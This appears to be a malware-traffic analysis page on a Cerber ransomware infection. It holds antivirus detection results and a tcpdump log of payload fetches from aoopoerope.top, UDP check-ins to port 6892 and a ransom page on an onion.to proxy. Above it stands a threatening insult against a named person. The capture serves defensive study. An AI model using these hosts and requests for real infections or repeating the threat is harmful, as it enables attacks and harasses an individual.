Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

Cerber Ransomware Trojan Malware read.php aoopoerope.top Traffic Analysis Full PCAP File Download

Download Attachments

  • 1 pcap fdat
    Date added: January 16, 2017 7:45 am Added by: admin File size: 151 KB Downloads: 95
SHA256: edf9fd11f47c914459f673a5c635801208c14217a6d714f6b60b7ce4b62e54d8
File name: read.php
Detection ratio: 10 / 57
Analysis date: 2017-01-16 07:37:11 UTC ( 0 minutes ago )
AhnLab-V3 Trojan/Win32.Cerber.C1748597 20170116
Avast Win32:Malware-gen 20170116
Avira (no cloud) TR/Crypt.Xpack.amsqc 20170116
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9985 20170116
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
ESET-NOD32 a variant of Win32/Injector.DJVO 20170116
Invincea worm.win32.kasidet.f 20170111
Kaspersky UDS:DangerousObject.Multi.Generic 20170116
Qihoo-360 HEUR/QVM42.0.0000.Malware.Gen 20170116
Rising Malware.Generic!YNz7NgPxwWG@1 (thunder) 20170116

 

2017-01-15 23:39:23.889013 IP 192.168.1.102.62841 > 35.161.229.79.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..M=.@….}…f#..O.y.P.8..2>..P…>…GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoopoerope.top
Connection: Keep-Alive

2017-01-15 23:41:05.390291 IP 192.168.1.102.63001 > 23.34.0.137.80: Flags [P.], seq 0:276, ack 1, win 256, length 276: HTTP: GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
E..<Eq@……..f.”…..Pd……DP…+…GET /pkiops/crl/MicWinProPCA2011_2011-10-19.crl HTTP/1.1
Cache-Control: max-age = 393
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Mon, 26 Dec 2016 06:01:59 GMT
If-None-Match: “e6d8ca913d5fd21:0”
User-Agent: Microsoft-CryptoAPI/10.0
Host: www.microsoft.com
2017-01-15 23:41:05.467921 IP 192.168.1.102.63001 > 23.34.0.137.80: Flags [.], ack 249, win 255, length 0
E..(Er@……..f.”…..Pd……<P….s……..
2017-01-15 23:41:23.387074 IP 192.168.1.102.55397 > 90.2.1.0.6892: UDP, length 25
E..5.8…..p…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387125 IP 192.168.1.102.55397 > 90.2.1.1.6892: UDP, length 25
E..5D……$…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387248 IP 192.168.1.102.55397 > 90.2.1.2.6892: UDP, length 25
E..5,……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387255 IP 192.168.1.102.55397 > 90.2.1.3.6892: UDP, length 25
E..5c`…..D…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387310 IP 192.168.1.102.55397 > 90.2.1.4.6892: UDP, length 25
E..5X……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387380 IP 192.168.1.102.55397 > 90.2.1.5.6892: UDP, length 25
E..5.t…../…fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387436 IP 192.168.1.102.55397 > 90.2.1.6.6892: UDP, length 25
E..5………..fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387442 IP 192.168.1.102.55397 > 90.2.1.7.6892: UDP, length 25
E..50……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387537 IP 192.168.1.102.55397 > 90.2.1.8.6892: UDP, length 25
E..5b……….fZ….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387543 IP 192.168.1.102.55397 > 90.2.1.9.6892: UDP, length 25
E..5-……….fZ.. .e…!..c9e537574920044695010008c
2017-01-15 23:41:23.387608 IP 192.168.1.102.55397 > 90.2.1.10.6892: UDP, length 25
E..5E……….fZ..
.e…!..c9e537574920044695010008c

2017-01-15 23:41:23.390149 IP 192.168.1.102.55397 > 91.239.24.2.6892: UDP, length 25
E..5bM…..k…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390153 IP 192.168.1.102.55397 > 91.239.24.3.6892: UDP, length 25
E..5-……….f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390201 IP 192.168.1.102.55397 > 91.239.24.4.6892: UDP, length 25
E..5.}…..9…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390279 IP 192.168.1.102.55397 > 91.239.24.5.6892: UDP, length 25
E..5Y……….f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390329 IP 192.168.1.102.55397 > 91.239.24.6.6892: UDP, length 25
E..51……     …f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390332 IP 192.168.1.102.55397 > 91.239.24.7.6892: UDP, length 25
E..5~#………f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390381 IP 192.168.1.102.55397 > 91.239.24.8.6892: UDP, length 25
E..5,h…..J…f[….e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390456 IP 192.168.1.102.55397 > 91.239.24.9.6892: UDP, length 25
E..5c……….f[..     .e…!..c9e537574920044695010008c
2017-01-15 23:41:23.390506 IP 192.168.1.102.55397 > 91.239.24.10.6892: UDP, length 25
E..5………..f[..
.e…!..c9e537574920044695010008c

2017-01-15 23:44:55.252080 IP 192.168.1.102.59606 > 90.2.1.12.6892: UDP, length 14
E..*1M…..Y…fZ……….7c9e5375749203e….
2017-01-15 23:44:55.252142 IP 192.168.1.102.59606 > 90.2.1.13.6892: UDP, length 14
E..*~……….fZ……….6c9e5375749203e….
2017-01-15 23:44:55.252193 IP 192.168.1.102.59606 > 90.2.1.14.6892: UDP, length 14
E..*.+…..z…fZ……….5c9e5375749203e….
2017-01-15 23:44:55.252197 IP 192.168.1.102.59606 > 90.2.1.15.6892: UDP, length 14
E..*Ys…..0…fZ……….4c9e5375749203e….
2017-01-15 23:44:55.252243 IP 192.168.1.102.59606 > 90.2.1.16.6892: UDP, length 14
E..*?……….fZ……….3c9e5375749203e….
2017-01-15 23:44:55.252330 IP 192.168.1.102.59606 > 90.2.1.17.6892: UDP, length 14
E..*p……….fZ……….2c9e5375749203e….
2017-01-15 23:44:55.252380 IP 192.168.1.102.59606 > 90.2.1.18.6892: UDP, length 14
E..*.Q…..P…fZ……….1c9e5375749203e….
2017-01-15 23:44:55.252383 IP 192.168.1.102.59606 > 90.2.1.19.6892: UDP, length 14
E..*W……….fZ……….0c9e5375749203e….
2017-01-15 23:44:55.252432 IP 192.168.1.102.59606 > 90.2.1.20.6892: UDP, length 14
E..*la…..=…fZ………./c9e5375749203e….
2017-01-15 23:44:55.252512 IP 192.168.1.102.59606 > 90.2.1.21.6892: UDP, length 14
E..*#……….fZ………..c9e5375749203e….
2017-01-15 23:44:55.252562 IP 192.168.1.102.59606 > 90.2.1.22.6892: UDP, length 14
E..*L’…..u…fZ……….-c9e5375749203e….
2017-01-15 23:44:55.252612 IP 192.168.1.102.59606 > 90.2.1.23.6892: UDP, length 14
E..*………..fZ……….,c9e5375749203e….
2017-01-15 23:44:55.252615 IP 192.168.1.102.59606 > 90.2.1.24.6892: UDP, length 14
E..*Vl………fZ……….+c9e5375749203e….
2017-01-15 23:44:55.252696 IP 192.168.1.102.59606 > 90.2.1.25.6892: UDP, length 14
E..*………..fZ……….*c9e5375749203e….
2017-01-15 23:44:55.252747 IP 192.168.1.102.59606 > 90.2.1.26.6892: UDP, length 14
E..*r”…..v…fZ……….)c9e5375749203e….
2017-01-15 23:44:55.252750 IP 192.168.1.102.59606 > 90.2.1.27.6892: UDP, length 14
E..*>……….fZ……….(c9e5375749203e….
2017-01-15 23:44:55.252797 IP 192.168.1.102.59606 > 90.2.1.28.6892: UDP, length 14
E..*………..fZ……….’c9e5375749203e….

2017-01-15 23:44:55.254495 IP 192.168.1.102.59606 > 91.239.24.0.6892: UDP, length 14
E..*G……….f[……….Uc9e5375749203e….
2017-01-15 23:44:55.254499 IP 192.168.1.102.59606 > 91.239.24.1.6892: UDP, length 14
E..*./………f[……….Tc9e5375749203e….
2017-01-15 23:44:55.254549 IP 192.168.1.102.59606 > 91.239.24.2.6892: UDP, length 14
E..*dM…..v…f[……….Sc9e5375749203e….
2017-01-15 23:44:55.254629 IP 192.168.1.102.59606 > 91.239.24.3.6892: UDP, length 14
E..*/……….f[……….Rc9e5375749203e….
2017-01-15 23:44:55.254679 IP 192.168.1.102.59606 > 91.239.24.4.6892: UDP, length 14
E..*.}…..D…f[……….Qc9e5375749203e….
2017-01-15 23:44:55.254683 IP 192.168.1.102.59606 > 91.239.24.5.6892: UDP, length 14
E..*[……….f[……….Pc9e5375749203e….
2017-01-15 23:44:55.254733 IP 192.168.1.102.59606 > 91.239.24.6.6892: UDP, length 14
E..*3……….f[……….Oc9e5375749203e….
2017-01-15 23:44:55.254810 IP 192.168.1.102.59606 > 91.239.24.7.6892: UDP, length 14
E..*.#………f[……….Nc9e5375749203e….
2017-01-15 23:44:55.254862 IP 192.168.1.102.59606 > 91.239.24.8.6892: UDP, length 14
E..*.h…..U…f[……….Mc9e5375749203e….
2017-01-15 23:44:55.254866 IP 192.168.1.102.59606 > 91.239.24.9.6892: UDP, length 14
E..*e……….f[..     …….Lc9e5375749203e….
2017-01-15 23:44:55.254916 IP 192.168.1.102.59606 > 91.239.24.10.6892: UDP, length 14

2017-01-15 23:46:39.295958 IP 192.168.1.102.63049 > 52.85.130.113.443: Flags [P.], seq 5186:5635, ack 7564, win 253, length 449
E…+.@…U3…f4U.q.I..N(….j.P…………..[e.o.zD..v…..a..m(j..Q…$.<.aN.Q}.yP5.$.3.1..Q
.]i..4n..7C….`…d..y….2″………R…[…..u@.@CZ..2.T…..1…..nH..(l..{…t&..thcIS..@…G{…n@&..=@………….%..O….0..R………..,….|…..he.5s.6….7/.-     ..6/m.\……Dl….5.*gH..o.C.7XY.#..vr.OG..v(…J1.y{p..2.S.#..R……>……….O…lT<.:Jx..]………….=..%ZT…..t..Fh..j.(……?~k.F.. .J4 ..r.q.b9}.sK.I.j#.%l…c.~..x….L…..B.5II..qm)……._f..
…2.j}<…
2017-01-15 23:46:39.651232 IP 192.168.1.102.63049 > 52.85.130.113.443: Flags [.], ack 8218, win 251, length 0
E..(+.@…V….f4U.q.I..N(….meP…[………
2017-01-15 23:46:50.493725 IP 192.168.1.102.50371 > 75.75.75.75.53: 60606+ A? download.mozilla.org. (38)
E..B.P………fKKKK…5……………..download.mozilla.org…..
2017-01-15 23:46:50.521505 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [S], seq 243451869, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4HD@……..f47…L.P………. ……………..
2017-01-15 23:46:50.523024 IP 192.168.1.102.50372 > 75.75.75.75.53: 4003+ A? bouncer-bouncer-elb.prod.mozaws.net. (53)
E..Q.Q………fKKKK…5.=……………bouncer-bouncer-elb.prod.mozaws.net…..
2017-01-15 23:46:50.547321 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [.], ack 2271199228, win 256, length 0
E..(HE@……..f47…L.P….._..P………….
2017-01-15 23:46:50.548854 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [P.], seq 0:335, ack 1, win 256, length 335: HTTP: GET /?product=firefox-48.0.2-complete&os=win&lang=en-US HTTP/1.1
E..wHF@….A…f47…L.P….._..P…….GET /?product=firefox-48.0.2-complete&os=win&lang=en-US HTTP/1.1
Host: download.mozilla.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=6000000-6299999
Connection: keep-alive

2017-01-15 23:46:50.567181 IP 192.168.1.102.50373 > 75.75.75.75.53: 48273+ AAAA? bouncer-bouncer-elb.prod.mozaws.net. (53)
E..Q.R………fKKKK…5.=……………bouncer-bouncer-elb.prod.mozaws.net…..
2017-01-15 23:46:50.591241 IP 192.168.1.102.50374 > 75.75.75.75.53: 36531+ AAAA? bouncer-bouncer-elb.prod.mozaws.net.localdomain. (65)
E..].S………fKKKK…5.I.]………….bouncer-bouncer-elb.prod.mozaws.net.localdomain…..
2017-01-15 23:46:50.650505 IP 192.168.1.102.63052 > 52.55.203.179.80: Flags [.], ack 419, win 255, length 0
E..(HG@……..f47…L.P…-._..P………….
2017-01-15 23:46:50.853975 IP 192.168.1.102.50375 > 75.75.75.75.53: 44713+ A? download.cdn.mozilla.net. (42)
E..F.T………fKKKK…5.2.u………….download.cdn.mozilla.net…..
2017-01-15 23:46:50.880072 IP 192.168.1.102.50376 > 75.75.75.75.53: 19427+ A? a1284.dscg.akamai.net. (39)
E..C.U………fKKKK…5./.OK…………a1284.dscg.akamai.net…..
2017-01-15 23:46:51.120513 IP 192.168.1.102.50377 > 75.75.75.75.53: 44333+ AAAA? a1284.dscg.akamai.net. (39)
E..C.V………fKKKK…5./<..-………..a1284.dscg.akamai.net…..
2017-01-15 23:46:53.787836 IP 192.168.1.102.50378 > 75.75.75.75.53: 21950+ A? tiles.services.mozilla.com. (44)
E..H.W………fKKKK…5.4vXU…………tiles.services.mozilla.com…..
2017-01-15 23:46:53.789311 IP 192.168.1.102.50379 > 75.75.75.75.53: 27066+ A? p27dokhpz2n7nvgr.onion.to. (43)
E..G.X………fKKKK…5.3..i…………p27dokhpz2n7nvgr.onion.to…..
2017-01-15 23:46:53.818089 IP 192.168.1.102.50380 > 75.75.75.75.53: 17597+ A? tiles.r53-2.services.mozilla.com. (50)
E..N.Y………fKKKK…5.:.tD…………tiles.r53-2.services.mozilla.com…..
2017-01-15 23:46:53.818625 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [S], seq 1224485300, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4<z@……..f4X.<.N..H.)……. ……………..
2017-01-15 23:46:53.843879 IP 192.168.1.102.50381 > 75.75.75.75.53: 63520+ A? location.services.mozilla.com. (47)
E..K.Z………fKKKK…5.7… ………..location.services.mozilla.com…..
2017-01-15 23:46:53.851378 IP 192.168.1.102.50382 > 75.75.75.75.53: 34479+ AAAA? tiles.r53-2.services.mozilla.com. (50)
E..N.[………fKKKK…5.:.d………….tiles.r53-2.services.mozilla.com…..
2017-01-15 23:46:53.865576 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [S], seq 3497315147, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    5@….1…f4.|=.O…t.K…… .H……………
2017-01-15 23:46:53.867029 IP 192.168.1.102.50383 > 75.75.75.75.53: 60980+ A? locprod1-elb-eu-west-1.prod.mozaws.net. (56)
E..T.\………fKKKK…5.@…4………..locprod1-elb-eu-west-1.prod.mozaws.net…..
2017-01-15 23:46:53.875338 IP 192.168.1.102.50384 > 75.75.75.75.53: 29643+ AAAA? tiles.r53-2.services.mozilla.com.localdomain. (62)
E..Z.]………fKKKK…5.Fu.s…………tiles.r53-2.services.mozilla.com.localdomain…..
2017-01-15 23:46:53.923208 IP 192.168.1.102.50385 > 75.75.75.75.53: 62983+ AAAA? locprod1-elb-eu-west-1.prod.mozaws.net. (56)
E..T.^………fKKKK…5.@……………locprod1-elb-eu-west-1.prod.mozaws.net…..
2017-01-15 23:46:53.947549 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [.], ack 2204531087, win 64240, length 0
E..(<{@……..f4X.<.N..H.)..fy.P…O………
2017-01-15 23:46:53.948324 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [P.], seq 0:208, ack 1, win 64240, length 208
E…<|@……..f4X.<.N..H.)..fy.P………………….,5,…`…..C.G..r.LCDr..”……+./…..
.       …..3.9./.5.
………….tiles.services.mozilla.com……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.027002 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [.], ack 1980024688, win 256, length 0
E..(    6@….<…f4.|=.O…t.Lv..pP…k5……..
2017-01-15 23:46:54.027136 IP 192.168.1.102.50386 > 75.75.75.75.53: 65330+ AAAA? locprod1-elb-eu-west-1.prod.mozaws.net.localdomain. (68)
E..`._………fKKKK…5.L]..2………..locprod1-elb-eu-west-1.prod.mozaws.net.localdomain…..

2017-01-15 23:46:54.245185 IP 192.168.1.102.63057 > 185.100.85.150.80: Flags [.], ack 1796123072, win 256, length 0
E..(NX@….n…f.dU..Q.Pf`..k…P….r……..
2017-01-15 23:46:54.245877 IP 192.168.1.102.63057 > 185.100.85.150.80: Flags [P.], seq 0:316, ack 1, win 256, length 316: HTTP: GET /C9E5-3757-4920-0446-96CD HTTP/1.1
E..dNY@….1…f.dU..Q.Pf`..k…P….}..GET /C9E5-3757-4920-0446-96CD HTTP/1.1
Host: p27dokhpz2n7nvgr.onion.to
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2017-01-15 23:46:54.654433 IP 192.168.1.102.63058 > 185.100.85.150.443: Flags [P.], seq 0:207, ack 1, win 256, length 207
E…N^@……..f.dU..R…SL..D..P………………4..”…..M.-…..\…8…..^..8…..+./…..
.       …..3.9./.5.
………….p27dokhpz2n7nvgr.onion.to……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.675502 IP 192.168.1.102.50393 > 75.75.75.75.53: 64425+ A? tiles-cloudfront.cdn.mozilla.net. (50)
E..N.f………fKKKK…5.:C…………..tiles-cloudfront.cdn.mozilla.net…..
2017-01-15 23:46:54.691829 IP 192.168.1.102.50394 > 75.75.75.75.53: 3950+ A? search.services.mozilla.com. (45)
E..I.g………fKKKK…5.5…n………..search.services.mozilla.com…..
2017-01-15 23:46:54.698859 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [S], seq 3527399029, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4I.@…+….f4U…W…?.u…… .)9…………..
2017-01-15 23:46:54.700308 IP 192.168.1.102.50395 > 75.75.75.75.53: 4361+ A? dcky6u1m8u6el.cloudfront.net. (46)
E..J.h………fKKKK…5.6.-.   ………..dcky6u1m8u6el
cloudfront.net…..
2017-01-15 23:46:54.716052 IP 192.168.1.102.63054 > 52.88.7.60.443: Flags [.], ack 3514, win 63687, length 0
E..(<.@……..f4X.<.N..H.,..f.HP…A0……..
2017-01-15 23:46:54.726857 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [.], ack 2078486373, win 256, length 0
E..(I.@…+….f4U…W…?.v{./eP………….
2017-01-15 23:46:54.732133 IP 192.168.1.102.63063 > 52.85.142.171.443: Flags [P.], seq 0:214, ack 1, win 256, length 214
E…I.@…+….f4U…W…?.v{./eP….e…………..g…-……L.Q’….>.2.go.!..a…..+./…..
.       …..3.9./.5.
…….%.#.. tiles-cloudfront.cdn.mozilla.net……….
……………..#..3t………h2.spdy/3.1.http/1.1……………………………..
2017-01-15 23:46:54.733632 IP 192.168.1.102.63055 > 52.18.124.61.443: Flags [.], ack 3342, win 254, length 0
E..(    <@….6…f4.|=.O…t.Ov..}P…[‘……..
2017-01-15 23:46:54.745274 IP 192.168.1.102.63064 > 52.36.246.167.443: Flags [S], seq 3053522528, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.w@….r…f4$…X…..`…… ……………..
2017-01-15 23:46:54.751550 IP 192.168.1.102.50396 > 75.75.75.75.53: 5442+ A? search.r53-2.services.mozilla.com. (51)
E..O.i………fKKKK…5.;7..B………..search.r53-2.services.mozilla.com…..
2017-01-15 23:46:54.752640 IP 192.168.1.102.50397 > 75.75.75.75.53: 60237+ AAAA? dcky6u1m8u6el.cloudfront.net. (46)
E..J.j………fKKKK…5.65..M………..dcky6u1m8u6el

2017-01-15 23:47:54.184861 IP 192.168.1.102.60652 > 75.75.75.75.53: 60795+ A? ciscobinary.openh264.org. (42)
E..F…….r…fKKKK…5.2…{………..ciscobinary.openh264.org…..
2017-01-15 23:47:54.204808 IP 192.168.1.102.63093 > 35.161.49.209.443: Flags [.], ack 3885, win 63271, length 0
E..(s.@…o….f#.1..u…c.QM…P..’U………
2017-01-15 23:47:54.217320 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [S], seq 2406696465, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.4@…X!…f.. b.v.P.sF……. ..U…………..
2017-01-15 23:47:54.230029 IP 192.168.1.102.60653 > 75.75.75.75.53: 19381+ A? a19.dscg10.akamai.net. (39)
E..C…….t…fKKKK…5./.TK…………a19.dscg10.akamai.net…..
2017-01-15 23:47:54.250576 IP 192.168.1.102.60654 > 75.75.75.75.53: 43727+ AAAA? a19.dscg10.akamai.net. (39)
E..C…….s…fKKKK…5./.9………….a19.dscg10.akamai.net…..
2017-01-15 23:47:54.258223 IP 192.168.1.102.63091 > 50.112.150.136.443: Flags [.], ack 3656, win 253, length 0
E..(>?@…1….f2p…s..YF..4*YvP…&………
2017-01-15 23:47:54.288833 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [.], ack 1515896577, win 256, length 0
E..(.5@…X,…f.. b.v.P.sF.ZZ..P…@………
2017-01-15 23:47:54.290361 IP 192.168.1.102.63094 > 165.254.32.98.80: Flags [P.], seq 0:449, ack 1, win 256, length 449: HTTP: GET /openh264-win32-0410d336bb748149a4f560eb6108090f078254b1.zip HTTP/1.1
E….6@…Vj…f.. b.v.P.sF.ZZ..P…….GET /openh264-win32-0410d336bb748149a4f560eb6108090f078254b1.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
If-Modified-Since: Tue, 02 Aug 2016 18:34:14 GMT
If-None-Match: ac4fcf1b56303959919767d33473cbb9

Leave a Reply